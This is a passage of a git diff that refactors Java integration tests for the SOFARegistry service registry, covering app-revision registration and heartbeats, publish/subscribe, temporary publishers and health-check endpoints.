+ suffix, ValueConstants.DEFAULT_GROUP, ValueConstants.DEFAULT_INSTANCE_ID); + + AppRevisionInterface inf1 = new AppRevisionInterface(); + AppRevisionInterface inf2 = new AppRevisionInterface(); + interfaceMap.put(dataInfo1, inf1); + interfaceMap.put(dataInfo2, inf2); + appRevision.setInterfaceMap(interfaceMap); + + inf1.setId("1"); + Map> serviceParams1 = new HashMap>(); + serviceParams1.put( + "metaParam2", + new ArrayList() { + { + add("metaValue2"); + } + }); + inf1.setServiceParams(serviceParams1); + + inf2.setId("2"); + Map> serviceParams2 = new HashMap>(); + serviceParams1.put( + "metaParam3", + new ArrayList() { + { + add("metaValue3"); + } + }); + inf1.setServiceParams(serviceParams2); + + appRevisionList.add(appRevision); + } + } + + @Test + public void register() throws ExecutionException, InterruptedException { + ExecutorService fixedThreadPool = Executors.newFixedThreadPool(1); + List> responses = new ArrayList<>(); + + // register + for (AppRevision appRevisionRegister : appRevisionList) { + Future response = + fixedThreadPool.submit( + (Callable) + () -> { + RegisterResponse result = new RegisterResponse(); + appRevisionHandlerStrategy.handleAppRevisionRegister( + appRevisionRegister, result); + return result; + }); + responses.add(response); + } + + for (Future future : responses) { + Assert.assertTrue(future.get().isSuccess()); + } + + // query app_revision + List> appRevisions = new ArrayList<>(); + for (AppRevision appRevisionRegister : appRevisionList) { + Future appRevision = + fixedThreadPool.submit( + (Callable) + () -> { + AppRevision revision = + appRevisionCacheRegistry.getRevision(appRevisionRegister.getRevision()); + Assert.assertEquals(revision.getRevision(), appRevisionRegister.getRevision()); + return revision; + }); + appRevisions.add(appRevision); + } + + Map revisionMap = new HashMap<>(); + for (Future future : appRevisions) { + AppRevision appRevision = future.get(); + revisionMap.put(appRevision.getRevision(), appRevision); + } + + // query by interface + List>> appsFuture = new ArrayList<>(); + for (AppRevision appRevisionRegister : appRevisionList) { + for (Map.Entry entry : + appRevisionRegister.getInterfaceMap().entrySet()) { + Future> submit = + fixedThreadPool.submit( + (Callable) + () -> { + String dataInfoId = entry.getKey(); + InterfaceMapping appNames = appRevisionCacheRegistry.getAppNames(dataInfoId); + Assert.assertTrue(appNames.getNanosVersion() > 0); + Assert.assertTrue(appNames.getApps().size() == 1); + Assert.assertTrue( + appNames.getApps().contains(appRevisionRegister.getAppName())); + return appNames; + }); + + appsFuture.add(submit); + } + } + + for (Future> future : appsFuture) { + future.get(); + } + + // heartbeat + Thread.sleep(3000); + for (AppRevision appRevisionRegister : appRevisionList) { + fixedThreadPool.submit( + () -> { + appRevisionHeartbeatRegistry.heartbeat(appRevisionRegister.getRevision()); + }); + } + appRevisionHeartbeatRegistry.doRevisionHeartbeat(); + } + + @Test + public void heartbeat() throws ExecutionException, InterruptedException { + ExecutorService fixedThreadPool = Executors.newFixedThreadPool(1); + + // query app_revision + for (AppRevision appRevisionRegister : appRevisionList) { + fixedThreadPool.submit( + () -> { + AppRevision revision = + appRevisionCacheRegistry.getRevision(appRevisionRegister.getRevision()); + Assert.assertTrue(revision == null); + }); + } + + // query by interface + for (AppRevision appRevisionRegister : appRevisionList) { + for (Map.Entry entry : + appRevisionRegister.getInterfaceMap().entrySet()) { + fixedThreadPool.submit( + () -> { + String dataInfoId = entry.getKey(); + InterfaceMapping appNames = appRevisionCacheRegistry.getAppNames(dataInfoId); + Assert.assertTrue(appNames.getNanosVersion() == -1); + Assert.assertTrue(appNames.getApps().size() == 0); + }); + } + } + + List> responseFutures = new ArrayList<>(); + for (AppRevision appRevisionRegister : appRevisionList) { + Future responseFuture = + fixedThreadPool.submit( + (Callable) + () -> { + MetaHeartbeatResponse response = + appRevisionHandlerStrategy.heartbeat( + Collections.singletonList(appRevisionRegister.getRevision())); + return response; + }); + responseFutures.add(responseFuture); + } + + // assert not found + for (Future responseFuture : responseFutures) { + MetaHeartbeatResponse metaHeartbeatResponse = responseFuture.get(); + Assert.assertEquals( + metaHeartbeatResponse.getStatusCode(), ValueConstants.METADATA_STATUS_DATA_NOT_FOUND); + } + + // register + List> responses = new ArrayList<>(); + for (AppRevision appRevisionRegister : appRevisionList) { + Future response = + fixedThreadPool.submit( + (Callable) + () -> { + RegisterResponse result = new RegisterResponse(); + appRevisionHandlerStrategy.handleAppRevisionRegister( + appRevisionRegister, result); + return result; + }); + responses.add(response); + } + + for (Future future : responses) { + Assert.assertTrue(future.get().isSuccess()); + } + + // query app_revision + List> appRevisions = new ArrayList<>(); + for (AppRevision appRevisionRegister : appRevisionList) { + Future appRevision = + fixedThreadPool.submit( + (Callable) + () -> { + AppRevision revision = + appRevisionCacheRegistry.getRevision(appRevisionRegister.getRevision()); + Assert.assertEquals(revision.getRevision(), appRevisionRegister.getRevision()); + return revision; + }); + appRevisions.add(appRevision); + } + + // query by interface + List>> appsFuture = new ArrayList<>(); + for (AppRevision appRevisionRegister : appRevisionList) { + for (Map.Entry entry : + appRevisionRegister.getInterfaceMap().entrySet()) { + Future> submit = + fixedThreadPool.submit( + (Callable) + () -> { + String dataInfoId = entry.getKey(); + InterfaceMapping appNames = appRevisionCacheRegistry.getAppNames(dataInfoId); + Assert.assertTrue(appNames.getNanosVersion() > 0); + Assert.assertTrue(appNames.getApps().size() == 1); + Assert.assertTrue( + appNames.getApps().contains(appRevisionRegister.getAppName())); + return appNames; + }); + + appsFuture.add(submit); + } + } + } +} diff --git a/test/src/test/java/com/alipay/sofa/registry/test/pubsub/PubSubTest.java b/test/src/test/java/com/alipay/sofa/registry/test/pubsub/PubSubTest.java index bb7c60a42..a796c590a 100644 --- a/test/src/test/java/com/alipay/sofa/registry/test/pubsub/PubSubTest.java +++ b/test/src/test/java/com/alipay/sofa/registry/test/pubsub/PubSubTest.java @@ -16,171 +16,183 @@ */ package com.alipay.sofa.registry.test.pubsub; +import static com.alipay.sofa.registry.client.constants.ValueConstants.DEFAULT_GROUP; +import static org.junit.Assert.assertEquals; + import com.alipay.sofa.registry.client.api.model.RegistryType; import com.alipay.sofa.registry.client.api.registration.PublisherRegistration; import com.alipay.sofa.registry.client.api.registration.SubscriberRegistration; import com.alipay.sofa.registry.core.model.ScopeEnum; import com.alipay.sofa.registry.test.BaseIntegrationTest; +import com.alipay.sofa.registry.test.BaseIntegrationTest.MySubscriberDataObserver; +import java.util.concurrent.CountDownLatch; import org.junit.Test; import org.junit.runner.RunWith; -import org.springframework.test.context.junit4.SpringRunner; - -import static com.alipay.sofa.registry.client.constants.ValueConstants.DEFAULT_GROUP; -import static org.junit.Assert.assertEquals; +import org.springframework.test.context.junit4.SpringJUnit4ClassRunner; -/** - * @author xuanbei 18/12/2 - */ -@RunWith(SpringRunner.class) +/** @author xuanbe 18/12/2 */ +@RunWith(SpringJUnit4ClassRunner.class) public class PubSubTest extends BaseIntegrationTest { - /** - * Publisher test. - * - * @throws InterruptedException the interrupted exception - */ - @Test - public void publisherTest() throws InterruptedException { - String dataId = "test-dataId-" + System.currentTimeMillis(); - String value = "test publish"; - - PublisherRegistration registration = new PublisherRegistration(dataId); - registryClient1.register(registration, value); - Thread.sleep(500L); - - SubscriberRegistration subReg = new SubscriberRegistration(dataId, - new MySubscriberDataObserver()); - subReg.setScopeEnum(ScopeEnum.dataCenter); - - registryClient1.register(subReg); - - Thread.sleep(1000L); - assertEquals(dataId, this.dataId); - assertEquals(LOCAL_REGION, userData.getLocalZone()); - assertEquals(1, userData.getZoneData().size()); - assertEquals(1, userData.getZoneData().values().size()); - assertEquals(true, userData.getZoneData().containsKey(LOCAL_REGION)); - assertEquals(1, userData.getZoneData().get(LOCAL_REGION).size()); - assertEquals(value, userData.getZoneData().get(LOCAL_REGION).get(0)); - - registryClient1.unregister(dataId, DEFAULT_GROUP, RegistryType.SUBSCRIBER); - registryClient1.unregister(dataId, DEFAULT_GROUP, RegistryType.PUBLISHER); - } - - /** - * Subscriber test. - * - * @throws InterruptedException the interrupted exception - */ - @Test - public void subscriberTest() throws InterruptedException { - String dataId = "test-dataId-" + System.currentTimeMillis(); - String value = "test subscriber"; - - SubscriberRegistration subReg = new SubscriberRegistration(dataId, - new MySubscriberDataObserver()); - subReg.setScopeEnum(ScopeEnum.dataCenter); - registryClient1.register(subReg); - Thread.sleep(500L); - - PublisherRegistration registration = new PublisherRegistration(dataId); - registryClient1.register(registration, value); - Thread.sleep(1000L); - - assertEquals(dataId, this.dataId); - assertEquals(LOCAL_REGION, userData.getLocalZone()); - assertEquals(1, userData.getZoneData().size()); - assertEquals(1, userData.getZoneData().values().size()); - assertEquals(true, userData.getZoneData().containsKey(LOCAL_REGION)); - assertEquals(1, userData.getZoneData().get(LOCAL_REGION).size()); - assertEquals(value, userData.getZoneData().get(LOCAL_REGION).get(0)); - - registryClient1.unregister(dataId, DEFAULT_GROUP, RegistryType.SUBSCRIBER); - registryClient1.unregister(dataId, DEFAULT_GROUP, RegistryType.PUBLISHER); - } - - /** - * Multi Client test. - * - * @throws InterruptedException the interrupted exception - */ - @Test - public void multiClientTest() throws InterruptedException { - - // registryClient1 publish data, registryClient2 subscriber - String dataId = "test-dataId-" + System.currentTimeMillis(); - String value = "test multi client publish"; - - PublisherRegistration registration = new PublisherRegistration(dataId); - registryClient1.register(registration, value); - Thread.sleep(500L); - - SubscriberRegistration subReg = new SubscriberRegistration(dataId, - new MySubscriberDataObserver()); - subReg.setScopeEnum(ScopeEnum.zone); - - registryClient2.register(subReg); - - Thread.sleep(1000L); - assertEquals(dataId, this.dataId); - assertEquals(LOCAL_REGION, userData.getLocalZone()); - assertEquals(1, userData.getZoneData().size()); - assertEquals(1, userData.getZoneData().values().size()); - assertEquals(true, userData.getZoneData().containsKey(LOCAL_REGION)); - assertEquals(1, userData.getZoneData().get(LOCAL_REGION).size()); - assertEquals(value, userData.getZoneData().get(LOCAL_REGION).get(0)); - - registryClient2.unregister(dataId, DEFAULT_GROUP, RegistryType.SUBSCRIBER); - registryClient1.unregister(dataId, DEFAULT_GROUP, RegistryType.PUBLISHER); - - // registryClient1 subscriber, registryClient2 publish data - dataId = "test-dataId-" + System.currentTimeMillis(); - value = "test multi client subscriber"; - - subReg = new SubscriberRegistration(dataId, new MySubscriberDataObserver()); - subReg.setScopeEnum(ScopeEnum.global); - registryClient1.register(subReg); - Thread.sleep(500L); - - registration = new PublisherRegistration(dataId); - registryClient2.register(registration, value); - Thread.sleep(1000L); - - assertEquals(dataId, this.dataId); - assertEquals(LOCAL_REGION, userData.getLocalZone()); - assertEquals(1, userData.getZoneData().size()); - assertEquals(1, userData.getZoneData().values().size()); - assertEquals(true, userData.getZoneData().containsKey(LOCAL_REGION)); - assertEquals(1, userData.getZoneData().get(LOCAL_REGION).size()); - assertEquals(value, userData.getZoneData().get(LOCAL_REGION).get(0)); - - registryClient1.unregister(dataId, DEFAULT_GROUP, RegistryType.SUBSCRIBER); - registryClient2.unregister(dataId, DEFAULT_GROUP, RegistryType.PUBLISHER); - - // registryClient1 subscriber, registryClient1 and registryClient2 both publish data - dataId = "test-dataId-" + System.currentTimeMillis(); - value = "test multi client subscriber"; - - subReg = new SubscriberRegistration(dataId, new MySubscriberDataObserver()); - subReg.setScopeEnum(ScopeEnum.zone); - registryClient1.register(subReg); - Thread.sleep(500L); - - registration = new PublisherRegistration(dataId); - registryClient1.register(registration, value); - registryClient2.register(registration, value); - Thread.sleep(1000L); - - assertEquals(dataId, this.dataId); - assertEquals(LOCAL_REGION, userData.getLocalZone()); - assertEquals(1, userData.getZoneData().size()); - assertEquals(1, userData.getZoneData().values().size()); - assertEquals(true, userData.getZoneData().containsKey(LOCAL_REGION)); - assertEquals(2, userData.getZoneData().get(LOCAL_REGION).size()); - assertEquals(value, userData.getZoneData().get(LOCAL_REGION).get(0)); - assertEquals(value, userData.getZoneData().get(LOCAL_REGION).get(1)); - - registryClient1.unregister(dataId, DEFAULT_GROUP, RegistryType.SUBSCRIBER); - registryClient1.unregister(dataId, DEFAULT_GROUP, RegistryType.PUBLISHER); - registryClient2.unregister(dataId, DEFAULT_GROUP, RegistryType.PUBLISHER); - } -} \ No newline at end of file + + private CountDownLatch countDownLatch = new CountDownLatch(1); + /** + * Publisher test. + * + * @throws InterruptedException the interrupted exception + */ + @Test + public void publisherTest() throws InterruptedException { + LOGGER.info("--------------------------------splitter-----------------------------"); + String dataId = "test-dataId-publisherTest-" + System.nanoTime(); + String value = "test publish"; + + PublisherRegistration registration = new PublisherRegistration(dataId); + registryClient1.register(registration, value); + Thread.sleep(2000L); + + PublisherRegistration registrationNotMatch = new PublisherRegistration(dataId + "_notmatch"); + registryClient1.register(registrationNotMatch, value); + Thread.sleep(2000L); + + MySubscriberDataObserver observer = new MySubscriberDataObserver(); + SubscriberRegistration subReg = new SubscriberRegistration(dataId, observer); + subReg.setScopeEnum(ScopeEnum.dataCenter); + + registryClient1.register(subReg); + + // countDownLatch.await(); + + Thread.sleep(3 * 1000L); + // Thread.sleep(2000000L); + assertEquals(dataId, observer.dataId); + assertEquals(LOCAL_REGION, observer.userData.getLocalZone()); + assertEquals(1, observer.userData.getZoneData().size()); + assertEquals(1, observer.userData.getZoneData().values().size()); + assertEquals(true, observer.userData.getZoneData().containsKey(LOCAL_REGION)); + assertEquals(1, observer.userData.getZoneData().get(LOCAL_REGION).size()); + assertEquals(value, observer.userData.getZoneData().get(LOCAL_REGION).get(0)); + + registryClient1.unregister(dataId, DEFAULT_GROUP, RegistryType.SUBSCRIBER); + registryClient1.unregister(dataId, DEFAULT_GROUP, RegistryType.PUBLISHER); + } + + /** + * Subscriber test. + * + * @throws InterruptedException the interrupted exception + */ + @Test + public void subscriberTest() throws InterruptedException { + String dataId = "test-dataId-subscriberTest-" + System.nanoTime(); + String value = "test subscriber"; + + MySubscriberDataObserver observer = new MySubscriberDataObserver(); + SubscriberRegistration subReg = new SubscriberRegistration(dataId, observer); + subReg.setScopeEnum(ScopeEnum.dataCenter); + registryClient1.register(subReg); + Thread.sleep(2000L); + + PublisherRegistration registration = new PublisherRegistration(dataId); + registryClient1.register(registration, value); + Thread.sleep(3000L); + + assertEquals(dataId, observer.dataId); + assertEquals(LOCAL_REGION, observer.userData.getLocalZone()); + assertEquals(1, observer.userData.getZoneData().size()); + assertEquals(1, observer.userData.getZoneData().values().size()); + assertEquals(true, observer.userData.getZoneData().containsKey(LOCAL_REGION)); + assertEquals(1, observer.userData.getZoneData().get(LOCAL_REGION).size()); + assertEquals(value, observer.userData.getZoneData().get(LOCAL_REGION).get(0)); + + registryClient1.unregister(dataId, DEFAULT_GROUP, RegistryType.SUBSCRIBER); + registryClient1.unregister(dataId, DEFAULT_GROUP, RegistryType.PUBLISHER); + } + + /** + * Multi Client test. + * + * @throws InterruptedException the interrupted exception + */ + @Test + public void multiClientTest() throws InterruptedException { + + // registryClient1 publish data, registryClient2 subscriber + String dataId = "test-dataId-multiClientTest-1-" + System.nanoTime(); + String value = "test multi client publish1"; + + PublisherRegistration registration = new PublisherRegistration(dataId); + registryClient1.register(registration, value); + Thread.sleep(2000L); + + MySubscriberDataObserver observer = new MySubscriberDataObserver(); + SubscriberRegistration subReg = new SubscriberRegistration(dataId, observer); + subReg.setScopeEnum(ScopeEnum.zone); + + registryClient2.register(subReg); + + Thread.sleep(2000L); + assertEquals(dataId, observer.dataId); + assertEquals(LOCAL_REGION, observer.userData.getLocalZone()); + assertEquals(1, observer.userData.getZoneData().size()); + assertEquals(1, observer.userData.getZoneData().values().size()); + assertEquals(true, observer.userData.getZoneData().containsKey(LOCAL_REGION)); + assertEquals(1, observer.userData.getZoneData().get(LOCAL_REGION).size()); + assertEquals(value, observer.userData.getZoneData().get(LOCAL_REGION).get(0)); + + registryClient2.unregister(dataId, DEFAULT_GROUP, RegistryType.SUBSCRIBER); + registryClient1.unregister(dataId, DEFAULT_GROUP, RegistryType.PUBLISHER); + + // registryClient1 subscriber, registryClient2 publish data + dataId = "test-dataId-multiClientTest-2-" + System.nanoTime(); + value = "test multi client subscriber2"; + + observer = new MySubscriberDataObserver(); + subReg = new SubscriberRegistration(dataId, observer); + subReg.setScopeEnum(ScopeEnum.global); + registryClient1.register(subReg); + Thread.sleep(2000L); + + registration = new PublisherRegistration(dataId); + registryClient2.register(registration, value); + Thread.sleep(3000L); + + assertEquals(dataId, observer.dataId); + assertEquals(LOCAL_REGION, observer.userData.getLocalZone()); + assertEquals(1, observer.userData.getZoneData().size()); + assertEquals(1, observer.userData.getZoneData().values().size()); + assertEquals(true, observer.userData.getZoneData().containsKey(LOCAL_REGION)); + assertEquals(1, observer.userData.getZoneData().get(LOCAL_REGION).size()); + assertEquals(value, observer.userData.getZoneData().get(LOCAL_REGION).get(0)); + + registryClient1.unregister(dataId, DEFAULT_GROUP, RegistryType.SUBSCRIBER); + registryClient2.unregister(dataId, DEFAULT_GROUP, RegistryType.PUBLISHER); + + // registryClient1 subscriber, registryClient1 and registryClient2 both publish data + dataId = "test-dataId-multiClientTest-3-" + System.currentTimeMillis(); + value = "test multi client subscriber3"; + + observer = new MySubscriberDataObserver(); + subReg = new SubscriberRegistration(dataId, observer); + subReg.setScopeEnum(ScopeEnum.zone); + registryClient1.register(subReg); + Thread.sleep(2000L); + + registration = new PublisherRegistration(dataId); + registryClient1.register(registration, value); + registryClient2.register(registration, value); + Thread.sleep(3000L); + + assertEquals(dataId, observer.dataId); + assertEquals(LOCAL_REGION, observer.userData.getLocalZone()); + assertEquals(1, observer.userData.getZoneData().size()); + assertEquals(1, observer.userData.getZoneData().values().size()); + assertEquals(true, observer.userData.getZoneData().containsKey(LOCAL_REGION)); + assertEquals(2, observer.userData.getZoneData().get(LOCAL_REGION).size()); + assertEquals(value, observer.userData.getZoneData().get(LOCAL_REGION).get(0)); + assertEquals(value, observer.userData.getZoneData().get(LOCAL_REGION).get(1)); + + registryClient1.unregister(dataId, DEFAULT_GROUP, RegistryType.SUBSCRIBER); + registryClient1.unregister(dataId, DEFAULT_GROUP, RegistryType.PUBLISHER); + registryClient2.unregister(dataId, DEFAULT_GROUP, RegistryType.PUBLISHER); + } +} diff --git a/test/src/test/java/com/alipay/sofa/registry/test/pubsub/TempPublisherTest.java b/test/src/test/java/com/alipay/sofa/registry/test/pubsub/TempPublisherTest.java index 391b3d4d5..5c96b2489 100644 --- a/test/src/test/java/com/alipay/sofa/registry/test/pubsub/TempPublisherTest.java +++ b/test/src/test/java/com/alipay/sofa/registry/test/pubsub/TempPublisherTest.java @@ -16,7 +16,13 @@ */ package com.alipay.sofa.registry.test.pubsub; +import static com.alipay.sofa.registry.client.constants.ValueConstants.DEFAULT_GROUP; +import static com.alipay.sofa.registry.common.model.constants.ValueConstants.DEFAULT_INSTANCE_ID; +import static org.junit.Assert.assertEquals; + import com.alipay.sofa.registry.client.api.model.RegistryType; +import com.alipay.sofa.registry.client.api.model.UserData; +import com.alipay.sofa.registry.client.api.registration.PublisherRegistration; import com.alipay.sofa.registry.client.api.registration.SubscriberRegistration; import com.alipay.sofa.registry.common.model.PublishType; import com.alipay.sofa.registry.common.model.ServerDataBox; @@ -24,18 +30,16 @@ import com.alipay.sofa.registry.common.model.store.Publisher; import com.alipay.sofa.registry.core.model.ScopeEnum; import com.alipay.sofa.registry.server.session.node.service.DataNodeService; +import com.alipay.sofa.registry.server.shared.env.ServerEnv; import com.alipay.sofa.registry.test.BaseIntegrationTest; -import org.junit.Test; -import org.junit.runner.RunWith; -import org.springframework.test.context.junit4.SpringRunner; - import java.util.ArrayList; import java.util.List; import java.util.UUID; - -import static com.alipay.sofa.registry.client.constants.ValueConstants.DEFAULT_GROUP; -import static com.alipay.sofa.registry.common.model.constants.ValueConstants.DEFAULT_INSTANCE_ID; -import static org.junit.Assert.assertEquals; +import java.util.concurrent.atomic.AtomicInteger; +import java.util.concurrent.atomic.AtomicReference; +import org.junit.Test; +import org.junit.runner.RunWith; +import org.springframework.test.context.junit4.SpringRunner; /** * @author xuanbei @@ -43,52 +47,121 @@ */ @RunWith(SpringRunner.class) public class TempPublisherTest extends BaseIntegrationTest { - @Test - public void doTest() throws Exception { - String dataId = "test-dataId-" + System.currentTimeMillis(); - String value = "test publish temp data"; - - // register SubscriberRegistration - SubscriberRegistration subReg = new SubscriberRegistration(dataId, - new MySubscriberDataObserver()); - subReg.setScopeEnum(ScopeEnum.zone); - registryClient1.register(subReg); - Thread.sleep(1000L); - assertEquals(dataId, this.dataId); - assertEquals(0, userData.getZoneData().size()); - - // publish temp data - Publisher tempPublisher = new Publisher(); - tempPublisher.setPublishType(PublishType.TEMPORARY); - tempPublisher.setCell(LOCAL_REGION); - tempPublisher.setDataId(dataId); - tempPublisher.setGroup(DEFAULT_GROUP); - tempPublisher.setInstanceId(DEFAULT_INSTANCE_ID); - tempPublisher.setVersion(System.currentTimeMillis()); - tempPublisher.setRegisterTimestamp(System.currentTimeMillis()); - tempPublisher.setClientRegisterTimestamp(System.currentTimeMillis()); - tempPublisher.setRegisterId(UUID.randomUUID().toString()); - tempPublisher.setDataInfoId(DataInfo.toDataInfoId(dataId, DEFAULT_INSTANCE_ID, - DEFAULT_GROUP)); - List dataBoxData = new ArrayList(1); - dataBoxData.add(new ServerDataBox(object2bytes(value))); - tempPublisher.setDataList(dataBoxData); - sessionApplicationContext.getBean(DataNodeService.class).register(tempPublisher); - - // data size is 1 - Thread.sleep(1000L); - assertEquals(dataId, this.dataId); - assertEquals(1, userData.getZoneData().size()); - userData = null; - registryClient1.unregister(dataId, DEFAULT_GROUP, RegistryType.SUBSCRIBER); - - // register another SubscriberRegistration, data size is 0 - subReg = new SubscriberRegistration(dataId, new MySubscriberDataObserver()); - subReg.setScopeEnum(ScopeEnum.zone); - registryClient1.register(subReg); - Thread.sleep(1000L); - assertEquals(dataId, this.dataId); - assertEquals(0, userData.getZoneData().size()); - registryClient1.unregister(dataId, DEFAULT_GROUP, RegistryType.SUBSCRIBER); - } + static AtomicInteger count = new AtomicInteger(); + + @Test + public synchronized void doTest() throws Exception { + String dataId = "test-dataId-" + this.getClass().getName() + System.currentTimeMillis(); + String value = "test publish temp data"; + AtomicReference dataIdRef = new AtomicReference<>(); + AtomicReference userDataRef = new AtomicReference<>(); + // register SubscriberRegistration + SubscriberRegistration subReg = + new SubscriberRegistration( + dataId, + (dataIdIn, data) -> { + dataIdRef.set(dataIdIn); + userDataRef.set(data); + System.out.println(count.getAndIncrement() + "-@@@:" + dataIdIn + ":" + data); + }); + + subReg.setScopeEnum(ScopeEnum.zone); + registryClient1.register(subReg); + Thread.sleep(5000L); + assertEquals(dataId, dataIdRef.get()); + assertEquals(0, userDataRef.get().getZoneData().size()); + + // publish temp data + Publisher tempPublisher = new Publisher(); + tempPublisher.setPublishType(PublishType.TEMPORARY); + tempPublisher.setCell(LOCAL_REGION); + tempPublisher.setDataId(dataId); + tempPublisher.setGroup(DEFAULT_GROUP); + tempPublisher.setInstanceId(DEFAULT_INSTANCE_ID); + tempPublisher.setVersion(System.currentTimeMillis()); + tempPublisher.setRegisterTimestamp(System.currentTimeMillis()); + tempPublisher.setClientRegisterTimestamp(System.currentTimeMillis()); + tempPublisher.setRegisterId(UUID.randomUUID().toString()); + tempPublisher.setDataInfoId(DataInfo.toDataInfoId(dataId, DEFAULT_INSTANCE_ID, DEFAULT_GROUP)); + tempPublisher.setSessionProcessId(ServerEnv.PROCESS_ID); + List dataBoxData = new ArrayList(1); + dataBoxData.add(new ServerDataBox(object2bytes(value))); + tempPublisher.setDataList(dataBoxData); + sessionApplicationContext.getBean(DataNodeService.class).register(tempPublisher); + + // data size is 1 + Thread.sleep(5000L); + assertEquals(dataId, dataIdRef.get()); + assertEquals(1, userDataRef.get().getZoneData().size()); + + userDataRef.set(null); + dataIdRef.set(null); + registryClient1.unregister(dataId, DEFAULT_GROUP, RegistryType.SUBSCRIBER); + + // register another SubscriberRegistration, data size is 0 + subReg = + new SubscriberRegistration( + dataId, + (dataIdIn, data) -> { + dataIdRef.set(dataIdIn); + userDataRef.set(data); + }); + subReg.setScopeEnum(ScopeEnum.zone); + registryClient1.register(subReg); + Thread.sleep(5000L); + assertEquals(dataId, dataIdRef.get()); + assertEquals(0, userDataRef.get().getZoneData().size()); + registryClient1.unregister(dataId, DEFAULT_GROUP, RegistryType.SUBSCRIBER); + } + + @Test + public synchronized void doTestPubAndTempPubSameTime() throws Exception { + String dataId = "test-same-time-pub&tempPub-" + System.currentTimeMillis(); + String value = "test same time publish"; + AtomicReference dataIdRef = new AtomicReference<>(); + AtomicReference userDataRef = new AtomicReference<>(); + + SubscriberRegistration subReg = + new SubscriberRegistration( + dataId, + (dataIdIn, data) -> { + dataIdRef.set(dataIdIn); + userDataRef.set(data); + }); + subReg.setScopeEnum(ScopeEnum.zone); + registryClient1.register(subReg); + Thread.sleep(5000L); + + // publish data + PublisherRegistration registration = new PublisherRegistration(dataId); + registryClient1.register(registration, "test publish"); + + Thread.sleep(5000L); + + // publish temp data + Publisher tempPublisher = new Publisher(); + tempPublisher.setPublishType(PublishType.TEMPORARY); + tempPublisher.setCell(LOCAL_REGION); + tempPublisher.setDataId(dataId); + tempPublisher.setGroup(DEFAULT_GROUP); + tempPublisher.setInstanceId(DEFAULT_INSTANCE_ID); + tempPublisher.setVersion(System.currentTimeMillis()); + tempPublisher.setRegisterTimestamp(System.currentTimeMillis()); + tempPublisher.setClientRegisterTimestamp(System.currentTimeMillis()); + tempPublisher.setRegisterId(UUID.randomUUID().toString()); + tempPublisher.setDataInfoId(DataInfo.toDataInfoId(dataId, DEFAULT_INSTANCE_ID, DEFAULT_GROUP)); + List dataBoxData = new ArrayList(1); + dataBoxData.add(new ServerDataBox(object2bytes(value))); + tempPublisher.setDataList(dataBoxData); + tempPublisher.setSessionProcessId(ServerEnv.PROCESS_ID); + sessionApplicationContext.getBean(DataNodeService.class).register(tempPublisher); + + Thread.sleep(5000L); + + assertEquals(1, userDataRef.get().getZoneData().size()); + assertEquals(2, userDataRef.get().getZoneData().get(LOCAL_REGION).size()); + + registryClient1.unregister(dataId, DEFAULT_GROUP, RegistryType.SUBSCRIBER); + registryClient1.unregister(dataId, DEFAULT_GROUP, RegistryType.PUBLISHER); + } } diff --git a/test/src/test/java/com/alipay/sofa/registry/test/resource/HealthCheckTest.java b/test/src/test/java/com/alipay/sofa/registry/test/resource/HealthCheckTest.java index 447405758..199896f98 100644 --- a/test/src/test/java/com/alipay/sofa/registry/test/resource/HealthCheckTest.java +++ b/test/src/test/java/com/alipay/sofa/registry/test/resource/HealthCheckTest.java @@ -16,36 +16,51 @@ */ package com.alipay.sofa.registry.test.resource; +import static javax.ws.rs.core.MediaType.APPLICATION_JSON; +import static org.junit.Assert.assertTrue; + import com.alipay.sofa.registry.common.model.CommonResponse; import com.alipay.sofa.registry.test.BaseIntegrationTest; import org.junit.Test; import org.junit.runner.RunWith; import org.springframework.test.context.junit4.SpringRunner; -import static javax.ws.rs.core.MediaType.APPLICATION_JSON; -import static org.junit.Assert.assertTrue; - /** * @author xuanbei * @since 2019/1/14 */ @RunWith(SpringRunner.class) public class HealthCheckTest extends BaseIntegrationTest { - @Test - public void metaHealthCheckTest() { - assertTrue(metaChannel.getWebTarget().path("health/check").request(APPLICATION_JSON) - .get(CommonResponse.class).isSuccess()); - } + @Test + public void metaHealthCheckTest() { + assertTrue( + metaChannel + .getWebTarget() + .path("health/check") + .request(APPLICATION_JSON) + .get(CommonResponse.class) + .isSuccess()); + } - @Test - public void dataHealthCheckTest() { - assertTrue(dataChannel.getWebTarget().path("health/check").request(APPLICATION_JSON) - .get(CommonResponse.class).isSuccess()); - } + @Test + public void dataHealthCheckTest() { + assertTrue( + dataChannel + .getWebTarget() + .path("health/check") + .request(APPLICATION_JSON) + .get(CommonResponse.class) + .isSuccess()); + } - @Test - public void sessionHealthCheckTest() { - assertTrue(sessionChannel.getWebTarget().path("health/check").request(APPLICATION_JSON) - .get(CommonResponse.class).isSuccess()); - } + @Test + public void sessionHealthCheckTest() { + assertTrue( + sessionChannel + .getWebTarget() + .path("health/check") + .request(APPLICATION_JSON) + .get(CommonResponse.class) + .isSuccess()); + } } diff --git a/test/src/test/java/com/alipay/sofa/registry/test/resource/data/DataDigestResourceTest.java b/test/src/test/java/com/alipay/sofa/registry/test/resource/data/DataDigestResourceTest.java index 2db2e7361..339c9023f 100644 --- a/test/src/test/java/com/alipay/sofa/registry/test/resource/data/DataDigestResourceTest.java +++ b/test/src/test/java/com/alipay/sofa/registry/test/resource/data/DataDigestResourceTest.java @@ -16,105 +16,183 @@ */ package com.alipay.sofa.registry.test.resource.data; +import static com.alipay.sofa.registry.client.constants.ValueConstants.DEFAULT_GROUP; +import static com.alipay.sofa.registry.common.model.constants.ValueConstants.DEFAULT_INSTANCE_ID; +import static javax.ws.rs.core.MediaType.APPLICATION_JSON; +import static org.junit.Assert.assertEquals; +import static org.junit.Assert.assertTrue; + import com.alipay.sofa.registry.client.api.model.RegistryType; import com.alipay.sofa.registry.client.api.registration.PublisherRegistration; import com.alipay.sofa.registry.client.api.registration.SubscriberRegistration; +import com.alipay.sofa.registry.common.model.constants.ValueConstants; import com.alipay.sofa.registry.common.model.dataserver.Datum; import com.alipay.sofa.registry.common.model.store.Publisher; import com.alipay.sofa.registry.core.model.ScopeEnum; +import com.alipay.sofa.registry.net.NetUtil; import com.alipay.sofa.registry.test.BaseIntegrationTest; +import java.util.HashMap; +import java.util.List; +import java.util.Map; +import javax.ws.rs.client.Entity; +import javax.ws.rs.core.GenericType; +import javax.ws.rs.core.MediaType; import org.junit.AfterClass; import org.junit.BeforeClass; import org.junit.Test; import org.junit.runner.RunWith; import org.springframework.test.context.junit4.SpringRunner; -import javax.ws.rs.client.Entity; -import javax.ws.rs.core.GenericType; -import javax.ws.rs.core.MediaType; -import java.util.HashMap; -import java.util.Map; - -import static com.alipay.sofa.registry.client.constants.ValueConstants.DEFAULT_GROUP; -import static 